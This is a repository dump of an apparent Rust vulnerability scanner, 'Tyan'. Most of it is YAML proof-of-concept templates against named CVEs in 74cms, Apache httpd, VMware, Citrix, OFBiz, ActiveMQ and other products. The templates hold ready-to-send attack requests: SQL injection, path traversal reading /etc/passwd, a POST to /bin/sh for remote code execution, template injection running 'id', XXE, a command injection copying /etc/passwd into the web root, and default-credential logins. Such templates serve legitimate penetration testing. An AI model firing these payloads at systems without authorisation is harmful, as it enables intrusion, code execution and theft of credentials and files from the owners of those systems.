├── .github
└── workflows
│ └── release.yml
├── Cargo.toml
├── LICENSE.txt
├── README.md
├── doc
├── gzh.jpg
└── wx.jpg
└── src
├── core
├── host_discovery.rs
├── mod.rs
├── nmap-service-probes.txt
├── port_scanner.rs
├── result_storage.rs
├── scanner.rs
└── service_info.rs
├── lib.rs
├── main.rs
└── plugins
├── config.yaml
├── mod.rs
├── pocs
├── 74cms-sqli-1.yml
├── 74cms-sqli-2.yml
├── 74cms-sqli.yml
├── CVE-2017-7504-Jboss-serialization-RCE.yml
├── CVE-2022-22947.yml
├── CVE-2022-22954-VMware-RCE.yml
├── CVE-2022-26134.yml
├── Hotel-Internet-Manage-RCE.yml
├── Struts2-062-cve-2021-31805-rce.yml
├── active-directory-certsrv-detect.yml
├── activemq-cve-2016-3088.yml
├── activemq-default-password.yml
├── airflow-unauth.yml
├── alibaba-canal-default-password.yml
├── alibaba-canal-info-leak.yml
├── alibaba-nacos-v1-auth-bypass.yml
├── alibaba-nacos.yml
├── amtt-hiboss-server-ping-rce.yml
├── apache-ambari-default-password.yml
├── apache-axis-webservice-detect.yml
├── apache-druid-cve-2021-36749.yml
├── apache-flink-upload-rce.yml
├── apache-httpd-cve-2021-40438-ssrf.yml
├── apache-httpd-cve-2021-41773-path-traversal.yml
├── apache-httpd-cve-2021-41773-rce.yml
├── apache-kylin-unauth-cve-2020-13937.yml
├── apache-nifi-api-unauthorized-access.yml
├── apache-ofbiz-cve-2018-8033-xxe.yml
├── apache-ofbiz-cve-2020-9496-xml-deserialization.yml
├── aspcms-backend-leak.yml
├── backup-file.yml
├── bash-cve-2014-6271.yml
├── bt742-pma-unauthorized-access.yml
├── cacti-weathermap-file-write.yml
├── chinaunicom-modem-default-password.yml
├── cisco-cve-2020-3452-readfile.yml
├── citrix-cve-2019-19781-path-traversal.yml
├── citrix-cve-2020-8191-xss.yml
├── citrix-cve-2020-8193-unauthorized.yml
├── citrix-xenmobile-cve-2020-8209.yml
├── coldfusion-cve-2010-2861-lfi.yml
├── confluence-cve-2015-8399.yml
├── confluence-cve-2019-3396-lfi.yml
├── confluence-cve-2021-26084.yml
├── confluence-cve-2021-26085-arbitrary-file-read.yml
├── consul-rexec-rce.yml
├── consul-service-rce.yml
├── coremail-cnvd-2019-16798.yml
├── couchcms-cve-2018-7662.yml
├── couchdb-cve-2017-12635.yml
├── couchdb-unauth.yml
├── craftcms-seomatic-cve-2020-9757-rce.yml
├── datang-ac-default-password-cnvd-2021-04128.yml
├── dedecms-carbuyaction-fileinclude.yml
├── dedecms-cve-2018-6910.yml
├── dedecms-cve-2018-7700-rce.yml
├── dedecms-guestbook-sqli.yml
├── dedecms-membergroup-sqli.yml
├── dedecms-url-redirection.yml
├── discuz-ml3x-cnvd-2019-22239.yml
├── discuz-v72-sqli.yml
├── discuz-wechat-plugins-unauth.yml
├── discuz-wooyun-2010-080723.yml
├── django-CVE-2018-14574.yml
├── dlink-850l-info-leak.yml
├── dlink-cve-2019-16920-rce.yml
├── dlink-cve-2019-17506.yml
├── dlink-cve-2020-25078-account-disclosure.yml
├── dlink-cve-2020-9376-dump-credentials.yml
├── dlink-dsl-2888a-rce.yml
├── docker-api-unauthorized-rce.yml
├── docker-registry-api-unauth.yml
├── dotnetcms-sqli.yml
├── draytek-cve-2020-8515.yml
├── druid-monitor-unauth.yml
├── drupal-cve-2014-3704-sqli.yml
├── drupal-cve-2018-7600-rce.yml
├── drupal-cve-2019-6340.yml
├── dubbo-admin-default-password.yml
├── duomicms-sqli.yml
├── dvr-cve-2018-9995.yml
├── e-office-v10-sql-inject.yml
├── e-office-v9-upload-cnvd-2021-49104.yml
├── e-zkeco-cnvd-2020-57264-read-file.yml
├── ecology-arbitrary-file-upload.yml
├── ecology-filedownload-directory-traversal.yml
├── ecology-javabeanshell-rce.yml
├── ecology-springframework-directory-traversal.yml
├── ecology-syncuserinfo-sqli.yml
├── ecology-v8-sqli.yml
├── ecology-validate-sqli.yml
├── ecology-workflowcentertreedata-sqli.yml
├── ecology-workflowservicexml.yml
├── ecshop-cnvd-2020-58823-sqli.yml
├── ecshop-collection-list-sqli.yml
├── ecshop-login-sqli.yml
├── ecshop-rce.yml
├── eea-info-leak-cnvd-2021-10543.yml
├── elasticsearch-cve-2014-3120.yml
├── elasticsearch-cve-2015-1427.yml
├── elasticsearch-cve-2015-3337-lfi.yml
├── elasticsearch-cve-2015-5531.yml
├── elasticsearch-unauth.yml
├── etcd-unauth.yml
├── etcd-v3-unauth.yml
├── etouch-v2-sqli.yml
├── exchange-cve-2021-26855-ssrf.yml
├── eyou-rce.yml
├── ezoffice-dpwnloadhttp.jsp-filedownload.yml
├── f5-cve-2021-22986.yml
├── f5-cve-2022-1388.yml
├── f5-tmui-cve-2020-5902-rce.yml
├── fangweicms-sqli.yml
├── fckeditor-info.yml
├── feifeicms-lfr.yml
├── finecms-sqli.yml
├── finereport-directory-traversal.yml
├── finereport-v8-arbitrary-file-read.yml
├── flexpaper-cve-2018-11686.yml
├── flink-jobmanager-cve-2020-17519-lfi.yml
├── fortigate-cve-2018-13379-readfile.yml
├── frp-dashboard-unauth.yml
├── gateone-cve-2020-35736.yml
├── gilacms-cve-2020-5515.yml
├── gitlab-graphql-info-leak-cve-2020-26413.yml
├── gitlab-ssrf-cve-2021-22214.yml
├── gitlist-rce-cve-2018-1000533.yml
├── glassfish-cve-2017-1000028-lfi.yml
├── go-pprof-leak.yml
├── gocd-cve-2021-43287.yml
├── h2-database-web-console-unauthorized-access.yml
├── h3c-imc-rce.yml
├── h3c-secparh-any-user-login.yml
├── h5s-video-platform-cnvd-2020-67113-unauth.yml
├── hadoop-yarn-unauth.yml
├── hanming-video-conferencing-file-read.yml
├── harbor-cve-2019-16097.yml
├── hikvision-cve-2017-7921.yml
├── hikvision-gateway-data-file-read.yml
├── hikvision-info-leak.yml
├── hikvision-intercom-service-default-password.yml
├── hikvision-showfile-file-read.yml
├── hikvision-unauthenticated-rce-cve-2021-36260.yml
├── hjtcloud-arbitrary-fileread.yml
├── hjtcloud-directory-file-leak.yml
├── huawei-home-gateway-hg659-fileread.yml
├── ifw8-router-cve-2019-16313.yml
├── iis-put-getshell.yml
├── influxdb-unauth.yml
├── inspur-tscev4-cve-2020-21224-rce.yml
├── jboss-cve-2010-1871.yml
├── jboss-unauth.yml
├── jeewms-showordownbyurl-fileread.yml
├── jellyfin-file-read-cve-2021-21402.yml
├── jenkins-cve-2018-1000600.yml
├── jenkins-cve-2018-1000861-rce.yml
├── jenkins-unauthorized-access.yml
├── jetty-cve-2021-28164.yml
├── jira-cve-2019-11581.yml
├── jira-cve-2019-8442.yml
├── jira-cve-2019-8449.yml
├── jira-cve-2020-14179.yml
├── jira-cve-2020-14181.yml
├── jira-ssrf-cve-2019-8451.yml
├── joomla-cnvd-2019-34135-rce.yml
├── joomla-component-vreview-sql.yml
├── joomla-cve-2015-7297-sqli.yml
├── joomla-cve-2017-8917-sqli.yml
├── joomla-cve-2018-7314-sql.yml
├── joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml
├── jumpserver-unauth-rce.yml
├── jupyter-notebook-unauthorized-access.yml
├── kafka-manager-unauth.yml
├── kibana-cve-2018-17246.yml
├── kibana-unauth.yml
├── kingdee-eas-directory-traversal.yml
├── kingsoft-v8-default-password.yml
├── kingsoft-v8-file-read.yml
├── kong-cve-2020-11710-unauth.yml
├── kubernetes-unauth.yml
├── kyan-network-monitoring-account-password-leakage.yml
├── landray-oa-custom-jsp-fileread.yml
├── lanproxy-cve-2021-3019-lfi.yml
├── laravel-cve-2021-3129.yml
├── laravel-debug-info-leak.yml
├── laravel-improper-webdir.yml
├── maccms-rce.yml
├── maccmsv10-backdoor.yml
├── metinfo-cve-2019-16996-sqli.yml
├── metinfo-cve-2019-16997-sqli.yml
├── metinfo-cve-2019-17418-sqli.yml
├── metinfo-file-read.yml
├── metinfo-lfi-cnvd-2018-13393.yml
├── minio-default-password.yml
├── mongo-express-cve-2019-10758.yml
├── mpsec-isg1000-file-read.yml
├── msvod-sqli.yml
├── myucms-lfr.yml
├── nagio-cve-2018-10735.yml
├── nagio-cve-2018-10736.yml
├── nagio-cve-2018-10737.yml
├── nagio-cve-2018-10738.yml
├── natshell-arbitrary-file-read.yml
├── netentsec-icg-default-password.yml
├── netentsec-ngfw-rce.yml
├── netgear-cve-2017-5521.yml
├── nextjs-cve-2017-16877.yml
├── nexus-cve-2019-7238.yml
├── nexus-cve-2020-10199.yml
├── nexus-cve-2020-10204.yml
├── nexus-default-password.yml
├── nexusdb-cve-2020-24571-path-traversal.yml
├── nhttpd-cve-2019-16278.yml
├── node-red-dashboard-file-read-cve-2021-3223.yml
├── novnc-url-redirection-cve-2021-3654.yml
├── nps-default-password.yml
├── ns-asg-file-read.yml
├── nsfocus-uts-password-leak.yml
├── nuuo-file-inclusion.yml
├── odoo-file-read.yml
├── openfire-cve-2019-18394-ssrf.yml
├── opentsdb-cve-2020-35476-rce.yml
├── panabit-gateway-default-password.yml
├── panabit-ixcache-default-password.yml
├── pandorafms-cve-2019-20224-rce.yml
├── pbootcms-database-file-download.yml
├── php-cgi-cve-2012-1823.yml
├── phpcms-cve-2018-19127.yml
├── phpmyadmin-cve-2018-12613-file-inclusion.yml
├── phpmyadmin-setup-deserialization.yml
├── phpok-sqli.yml
├── phpshe-sqli.yml
├── phpstudy-backdoor-rce.yml
├── phpstudy-nginx-wrong-resolve.yml
├── phpunit-cve-2017-9841-rce.yml
├── powercreator-arbitrary-file-upload.yml
├── prometheus-url-redirection-cve-2021-29622.yml
├── pulse-cve-2019-11510.yml
├── pyspider-unauthorized-access.yml
├── qibocms-sqli.yml
├── qilin-bastion-host-rce.yml
├── qizhi-fortressaircraft-unauthorized.yml
├── qnap-cve-2019-7192.yml
├── rabbitmq-default-password.yml
├── rails-cve-2018-3760-rce.yml
├── razor-cve-2018-8770.yml
├── rconfig-cve-2019-16663.yml
├── resin-cnnvd-200705-315.yml
├── resin-inputfile-fileread-or-ssrf.yml
├── resin-viewfile-fileread.yml
├── rockmongo-default-password.yml
├── ruijie-eg-cli-rce.yml
├── ruijie-eg-file-read.yml
├── ruijie-eg-info-leak.yml
├── ruijie-eweb-rce-cnvd-2021-09650.yml
├── ruijie-nbr1300g-cli-password-leak.yml
├── ruijie-uac-cnvd-2021-14536.yml
├── ruoyi-management-fileread.yml
├── saltstack-cve-2020-16846.yml
├── saltstack-cve-2021-25282-file-write.yml
├── samsung-wea453e-default-pwd.yml
├── samsung-wea453e-rce.yml
├── samsung-wlan-ap-wea453e-rce.yml
├── sangfor-ad-download.php-filedownload.yml
├── sangfor-ba-rce.yml
├── sangfor-edr-arbitrary-admin-login.yml
├── sangfor-edr-cssp-rce.yml
├── sangfor-edr-tool-rce.yml
├── satellian-cve-2020-7980-rce.yml
├── seacms-before-v992-rce.yml
├── seacms-rce.yml
├── seacms-sqli.yml
├── seacms-v654-rce.yml
├── seacmsv645-command-exec.yml
├── secnet-ac-default-password.yml
├── seeyon-a6-employee-info-leak.yml
├── seeyon-a6-test-jsp-sql.yml
├── seeyon-ajax-unauthorized-access.yml
├── seeyon-cnvd-2020-62422-readfile.yml
├── seeyon-oa-a8-m-information-disclosure.yml
├── seeyon-oa-cookie-leak.yml
├── seeyon-session-leak.yml
├── seeyon-setextno-jsp-sql.yml
├── seeyon-unauthoried.yml
├── seeyon-wooyun-2015-0108235-sqli.yml
├── seeyon-wooyun-2015-148227.yml
├── shiro-key.yml
├── shiziyu-cms-apicontroller-sqli.yml
├── shopxo-cnvd-2021-15822.yml
├── showdoc-default-password.yml
├── showdoc-uploadfile.yml
├── skywalking-cve-2020-9483-sqli.yml
├── solarwinds-cve-2020-10148.yml
├── solr-cve-2017-12629-xxe.yml
├── solr-cve-2019-0193.yml
├── solr-fileread.yml
├── solr-velocity-template-rce.yml
├── sonarqube-cve-2020-27986-unauth.yml
├── sonicwall-ssl-vpn-rce.yml
├── spark-api-unauth.yml
├── spark-webui-unauth.yml
├── spon-ip-intercom-ping-rce.yml
├── spring-actuator-heapdump-file.yml
├── spring-cloud-cve-2020-5405.yml
├── spring-cloud-cve-2020-5410.yml
├── spring-core-rce.yml
├── spring-cve-2016-4977.yml
├── springboot-cve-2021-21234.yml
├── springboot-env-unauth.yml
├── springcloud-cve-2019-3799.yml
├── sql-file.yml
├── struts2-045.yml
├── struts2-046-1.yml
├── supervisord-cve-2017-11610.yml
├── swagger-ui-unauth.yml
├── tamronos-iptv-rce.yml
├── telecom-gateway-default-password.yml
├── tensorboard-unauth.yml
├── terramaster-cve-2020-15568.yml
├── terramaster-tos-rce-cve-2020-28188.yml
├── thinkadmin-v6-readfile.yml
├── thinkcmf-lfi.yml
├── thinkcmf-write-shell.yml
├── thinkphp-v6-file-write.yml
├── thinkphp5-controller-rce.yml
├── thinkphp5023-method-rce.yml
├── tianqing-info-leak.yml
├── tomcat-cve-2017-12615-rce.yml
├── tomcat-cve-2018-11759.yml
├── tomcat-manager-weak.yml
├── tongda-insert-sql-inject.yml
├── tongda-meeting-unauthorized-access.yml
├── tongda-oa-v11.9-api.ali.php-upload.yml
├── tongda-user-session-disclosure.yml
├── tongda-v2017-uploadfile.yml
├── tpshop-directory-traversal.yml
├── tpshop-sqli.yml
├── tvt-nvms-1000-file-read-cve-2019-20085.yml
├── typecho-rce.yml
├── ueditor-cnvd-2017-20077-file-upload.yml
├── uwsgi-cve-2018-7490.yml
├── vbulletin-cve-2019-16759-bypass.yml
├── vbulletin-cve-2019-16759.yml
├── vmware-vcenter-arbitrary-file-read.yml
├── vmware-vcenter-cve-2021-21985-rce.yml
├── vmware-vcenter-unauthorized-rce-cve-2021-21972.yml
├── vmware-vrealize-cve-2021-21975-ssrf.yml
├── weaver-E-Cology-getSqlData-sqli.yml
├── weaver-ebridge-file-read.yml
├── weaver-oa-eoffice-v9-upload-getshell.yml
├── weblogic-console-weak.yml
├── weblogic-cve-2017-10271.yml
├── weblogic-cve-2019-2725.yml
├── weblogic-cve-2019-2729-1.yml
├── weblogic-cve-2019-2729-2.yml
├── weblogic-cve-2020-14750.yml
├── weblogic-ssrf.yml
├── webmin-cve-2019-15107-rce.yml
├── weiphp-path-traversal.yml
├── weiphp-sql.yml
├── wifisky-default-password-cnvd-2021-39012.yml
├── wordpress-cve-2019-19985-infoleak.yml
├── wordpress-ext-adaptive-images-lfi.yml
├── wordpress-ext-mailpress-rce.yml
├── wuzhicms-v410-sqli.yml
├── xdcms-sql.yml
├── xiuno-bbs-cvnd-2019-01348-reinstallation.yml
├── xunchi-cnvd-2020-23735-file-read.yml
├── yapi-rce.yml
├── yccms-rce.yml
├── yonyou-grp-u8-sqli-to-rce.yml
├── yonyou-grp-u8-sqli.yml
├── yonyou-nc-arbitrary-file-upload.yml
├── yonyou-nc-bsh-servlet-bshservlet-rce.yml
├── yonyou-u8-oa-sqli.yml
├── youphptube-encoder-cve-2019-5127.yml
├── youphptube-encoder-cve-2019-5128.yml
├── youphptube-encoder-cve-2019-5129.yml
├── yungoucms-sqli.yml
├── zabbix-authentication-bypass.yml
├── zabbix-cve-2016-10134-sqli.yml
├── zabbix-default-password.yml
├── zcms-v3-sqli.yml
├── zeit-nodejs-cve-2020-5284-directory-traversal.yml
├── zeroshell-cve-2019-12725-rce.yml
├── zimbra-cve-2019-9670-xxe.yml
└── zzcms-zsmanage-sqli.yml
├── rabbitmq_plugin.rs
├── ssh_plugin.rs
├── web_plugin.rs
├── web_poc_plugin.rs
└── web_title_plugin.rs
/doc/gzh.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TheBlindM/Tyan/4d898e995aaab852a33250a8922d884a935e6aec/doc/gzh.jpg
--------------------------------------------------------------------------------
/doc/wx.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TheBlindM/Tyan/4d898e995aaab852a33250a8922d884a935e6aec/doc/wx.jpg
--------------------------------------------------------------------------------
/src/core/mod.rs:
--------------------------------------------------------------------------------
1 | pub mod host_discovery;
2 | pub mod port_scanner;
3 | pub mod scanner;
4 | pub mod service_info;
5 | pub mod result_storage;
6 |
--------------------------------------------------------------------------------
/src/lib.rs:
--------------------------------------------------------------------------------
1 | pub mod core;
2 | pub mod plugins;
3 |
4 | pub use crate::core::host_discovery::HostDiscovery;
5 | pub use crate::core::port_scanner::PortScanner;
6 | pub use crate::core::service_info::{identify_service, ScanResult, ServiceInfo, ServiceScanOptions, ServiceScanner};
7 |
--------------------------------------------------------------------------------
/src/plugins/pocs/74cms-sqli-1.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-74cms-sqli-1
2 | set:
3 | rand: randomInt(200000000, 210000000)
4 | rules:
5 | - method: POST
6 | path: /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709\xc3\x97tamp=&nonce=
7 | headers:
8 | Content-Type: 'text/xml'
9 | body: ]>&test;111112331%' union select md5({{rand}})#
10 | follow_redirects: false
11 | expression: |
12 | response.body.bcontains(bytes(md5(string(rand))))
13 | detail:
14 | author: betta(https://github.com/betta-cyber)
15 | links:
16 | - https://www.uedbox.com/post/29340
17 |
--------------------------------------------------------------------------------
/src/plugins/pocs/74cms-sqli-2.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-74cms-sqli-2
2 | set:
3 | rand: randomInt(200000000, 210000000)
4 | rules:
5 | - method: GET
6 | path: /plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{rand}}),5,6,7,8,9%23
7 | expression: |
8 | response.body.bcontains(bytes(md5(string(rand))))
9 | detail:
10 | author: rexus
11 | links:
12 | - https://www.uedbox.com/post/30019/
13 |
--------------------------------------------------------------------------------
/src/plugins/pocs/74cms-sqli.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-74cms-sqli
2 | rules:
3 | - method: GET
4 | path: /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5(99999999))) -- a
5 | expression: |
6 | response.body.bcontains(b"ef775988943825d2871e1cfa75473ec")
7 | detail:
8 | author: jinqi
9 | links:
10 | - https://www.t00ls.net/articles-54436.html
11 |
--------------------------------------------------------------------------------
/src/plugins/pocs/CVE-2017-7504-Jboss-serialization-RCE.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-CVE-2017-7504-Jboss-serialization-RCE
2 | rules:
3 | - method: GET
4 | path: /jbossmq-httpil/HTTPServerILServlet
5 | expression: |
6 | response.status == 200 && response.body.bcontains(b'This is the JBossMQ HTTP-IL')
7 | detail:
8 | author: mamba
9 | description: "CVE-2017-7504-Jboss-serialization-RCE by chaosec公众号"
10 | links:
11 | - https://github.com/chaosec2021
12 |
--------------------------------------------------------------------------------
/src/plugins/pocs/CVE-2022-22954-VMware-RCE.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-CVE-2022-22954-VMware-RCE
2 | rules:
3 | - method: GET
4 | path: /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b"freemarker%2etemplate%2eutility%2eExecute"%3fnew%28%29%28"id"%29%7d
5 | expression: |
6 | response.status == 400 && "device id:".bmatches(response.body)
7 | detail:
8 | author: mamba
9 | description: "CVE-2022-22954-VMware-RCE by chaosec公众号"
10 | links:
11 | - https://github.com/chaosec2021
12 |
--------------------------------------------------------------------------------
/src/plugins/pocs/Hotel-Internet-Manage-RCE.yml:
--------------------------------------------------------------------------------
1 | name: Hotel-Internet-Manage-RCE
2 | rules:
3 | - method: GET
4 | path: "/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../Test.txt&id=1"
5 | expression: |
6 | response.status == 200 && response.body.bcontains(b"parent.doTestResult")
7 | detail:
8 | author: test
9 | Affected Version: "Hotel Internet Billing & Operation Support System"
10 | links:
11 | - http://118.190.97.19:88/qingy/Web%E5%AE%89%E5%85%A8
12 |
13 |
--------------------------------------------------------------------------------
/src/plugins/pocs/active-directory-certsrv-detect.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-active-directory-certsrv-detect
2 | rules:
3 | - method: GET
4 | path: /certsrv/certrqad.asp
5 | follow_redirects: false
6 | expression: |
7 | response.status == 401 && "Server" in response.headers && response.headers["Server"].contains("Microsoft-IIS") && response.body.bcontains(bytes("401 - ")) && "Www-Authenticate" in response.headers && response.headers["Www-Authenticate"].contains("Negotiate") && "Www-Authenticate" in response.headers && response.headers["Www-Authenticate"].contains("NTLM")
8 | detail:
9 | author: AgeloVito
10 | links:
11 | - https://www.cnblogs.com/EasonJim/p/6859345.html
12 |
--------------------------------------------------------------------------------
/src/plugins/pocs/activemq-default-password.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-activemq-default-password
2 | rules:
3 | - method: GET
4 | path: /admin/
5 | expression: |
6 | response.status == 401 && response.body.bcontains(b"Unauthorized")
7 | - method: GET
8 | path: /admin/
9 | headers:
10 | Authorization: Basic YWRtaW46YWRtaW4=
11 | expression: |
12 | response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"
Broker
")
13 | detail:
14 | author: pa55w0rd(www.pa55w0rd.online/)
15 | links:
16 | - https://blog.csdn.net/ge00111/article/details/72765210
--------------------------------------------------------------------------------
/src/plugins/pocs/airflow-unauth.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-airflow-unauth
2 | rules:
3 | - method: GET
4 | path: /admin/
5 | expression: |
6 | response.status == 200 && response.body.bcontains(b"Airflow - DAGs") && response.body.bcontains(b"DAGs
")
7 | detail:
8 | author: pa55w0rd(www.pa55w0rd.online/)
9 | links:
10 | - http://airflow.apache.org/
11 |
--------------------------------------------------------------------------------
/src/plugins/pocs/alibaba-canal-default-password.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-alibaba-canal-default-password
2 | rules:
3 | - method: POST
4 | path: /api/v1/user/login
5 | expression: |
6 | response.status == 200 && response.body.bcontains(b"com.alibaba.otter.canal.admin.controller.UserController.login")
7 | - method: POST
8 | path: /api/v1/user/login
9 | headers:
10 | Content-Type: application/json
11 | body: >-
12 | {"username":"admin","password":"123456"}
13 | follow_redirects: false
14 | expression: |
15 | response.status == 200 && response.body.bcontains(b"{\"code\":20000,") && response.body.bcontains(b"\"data\":{\"token\"")
16 | detail:
17 | author: jweny(https://github.com/jweny)
18 | links:
19 | - https://www.cnblogs.com/xiexiandong/p/12888582.html
20 |
--------------------------------------------------------------------------------
/src/plugins/pocs/alibaba-canal-info-leak.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-alibaba-canal-info-leak
2 | rules:
3 | - method: GET
4 | path: /api/v1/canal/config/1/1
5 | follow_redirects: false
6 | expression: |
7 | response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"ncanal.aliyun.accessKey") && response.body.bcontains(b"ncanal.aliyun.secretKey")
8 | detail:
9 | author: Aquilao(https://github.com/Aquilao)
10 | info: alibaba Canal info leak
11 | links:
12 | - https://my.oschina.net/u/4581879/blog/4753320
--------------------------------------------------------------------------------
/src/plugins/pocs/alibaba-nacos.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-alibaba-nacos
2 | rules:
3 | - method: GET
4 | path: /nacos/
5 | follow_redirects: true
6 | expression: |
7 | response.body.bcontains(bytes("Nacos"))
8 | detail:
9 | author: AgeloVito
10 | info: alibaba-nacos
11 | login: nacos/nacos
12 | links:
13 | - https://blog.csdn.net/caiqiiqi/article/details/112005424
14 |
--------------------------------------------------------------------------------
/src/plugins/pocs/apache-ambari-default-password.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-apache-ambari-default-password
2 | rules:
3 | - method: GET
4 | path: /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name
5 | headers:
6 | Authorization: Basic YWRtaW46YWRtaW4=
7 | expression: response.status == 200 && response.body.bcontains(b"PrivilegeInfo") && response.body.bcontains(b"AMBARI.ADMINISTRATOR")
8 | detail:
9 | author: wulalalaaa(https://github.com/wulalalaaa)
10 | links:
11 | - https://cwiki.apache.org/confluence/display/AMBARI/Quick+Start+Guide
12 |
--------------------------------------------------------------------------------
/src/plugins/pocs/apache-axis-webservice-detect.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-apache-axis-webservice-detect
2 | sets:
3 | path:
4 | - services
5 | - servlet/AxisaxiServlet
6 | - servlet/AxisServlet
7 | - services/listServices
8 | - services/FreeMarkerService
9 | - services/AdminService
10 | - axis/services
11 | - axis2/services
12 | - axis/servlet/AxisServlet
13 | - axis2/servlet/AxisServlet
14 | - axis2/services/listServices
15 | - axis/services/FreeMarkerService
16 | - axis/services/AdminService
17 | rules:
18 | - method: GET
19 | path: /{{path}}
20 | expression: |
21 | response.body.bcontains(b"Services") && response.body.bcontains(b'?wsdl">')
22 | detail:
23 | author: AgeloVito
24 | links:
25 | - https://paper.seebug.org/1489
26 |
--------------------------------------------------------------------------------
/src/plugins/pocs/apache-httpd-cve-2021-41773-path-traversal.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-apache-httpd-cve-2021-41773-path-traversal
2 | groups:
3 | cgibin:
4 | - method: GET
5 | path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
6 | expression: |
7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
8 | icons:
9 | - method: GET
10 | path: /icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
11 | expression: |
12 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
13 | detail:
14 | author: JingLing(https://github.com/shmilylty)
15 | links:
16 | - https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQ
--------------------------------------------------------------------------------
/src/plugins/pocs/apache-httpd-cve-2021-41773-rce.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-apache-httpd-cve-2021-41773-rce
2 | set:
3 | r1: randomInt(800000000, 1000000000)
4 | r2: randomInt(800000000, 1000000000)
5 | rules:
6 | - method: POST
7 | path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
8 | body: echo;expr {{r1}} + {{r2}}
9 | expression: |
10 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
11 | detail:
12 | author: B1anda0(https://github.com/B1anda0)
13 | links:
14 | - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
15 |
--------------------------------------------------------------------------------
/src/plugins/pocs/apache-kylin-unauth-cve-2020-13937.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-apache-kylin-unauth-cve-2020-13937
2 | rules:
3 | - method: GET
4 | path: /kylin/api/admin/config
5 | expression: |
6 | response.status == 200 && response.headers["Content-Type"].contains("application/json") && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url")
7 | detail:
8 | author: JingLing(github.com/shmilylty)
9 | links:
10 | - https://s.tencent.com/research/bsafe/1156.html
11 |
--------------------------------------------------------------------------------
/src/plugins/pocs/apache-nifi-api-unauthorized-access.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-apache-nifi-api-unauthorized-access
2 | manual: true
3 | transport: http
4 | rules:
5 | - method: GET
6 | path: /nifi-api/flow/current-user
7 | follow_redirects: false
8 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"identity\":\"anonymous\",\"anonymous\":true")
9 | detail:
10 | author: wulalalaaa(https://github.com/wulalalaaa)
11 | links:
12 | - https://nifi.apache.org/docs/nifi-docs/rest-api/index.html
13 |
--------------------------------------------------------------------------------
/src/plugins/pocs/apache-ofbiz-cve-2018-8033-xxe.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-apache-ofbiz-cve-2018-8033-xxe
2 | rules:
3 | - method: POST
4 | path: /webtools/control/xmlrpc
5 | headers:
6 | Content-Type: application/xml
7 | body: >-
8 | ]>&disclose;
9 | follow_redirects: false
10 | expression: >
11 | response.status == 200 && response.content_type.contains("text/xml") && "root:[x*]:0:0:".bmatches(response.body)
12 | detail:
13 | author: su(https://suzzz112113.github.io/#blog)
14 | links:
15 | - https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py
16 |
--------------------------------------------------------------------------------
/src/plugins/pocs/aspcms-backend-leak.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-aspcms-backend-leak
2 | rules:
3 | - method: GET
4 | path: /plug/oem/AspCms_OEMFun.asp
5 | expression: |
6 | response.status == 200 && "")) && response.body.bcontains(b"citrix")
13 | detail:
14 | author: JingLing(https://hackfun.org/)
15 | links:
16 | - https://support.citrix.com/article/CTX276688
17 | - https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/
18 | - https://dmaasland.github.io/posts/citrix.html
19 |
--------------------------------------------------------------------------------
/src/plugins/pocs/citrix-cve-2020-8193-unauthorized.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-citrix-cve-2020-8193-unauthorized
2 | set:
3 | user: randomLowercase(8)
4 | pass: randomLowercase(8)
5 | rules:
6 | - method: POST
7 | path: "/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1"
8 | headers:
9 | Content-Type: application/xml
10 | X-NITRO-USER: '{{user}}'
11 | X-NITRO-PASS: '{{pass}}'
12 | body:
13 | follow_redirects: false
14 | expression: >
15 | response.status == 406 && "(?i)SESSID=\\w{32}".bmatches(bytes(response.headers["Set-Cookie"]))
16 | detail:
17 | author: bufsnake(https://github.com/bufsnake)
18 | links:
19 | - https://github.com/PR3R00T/CVE-2020-8193-Citrix-Scanner/blob/master/scanner.py
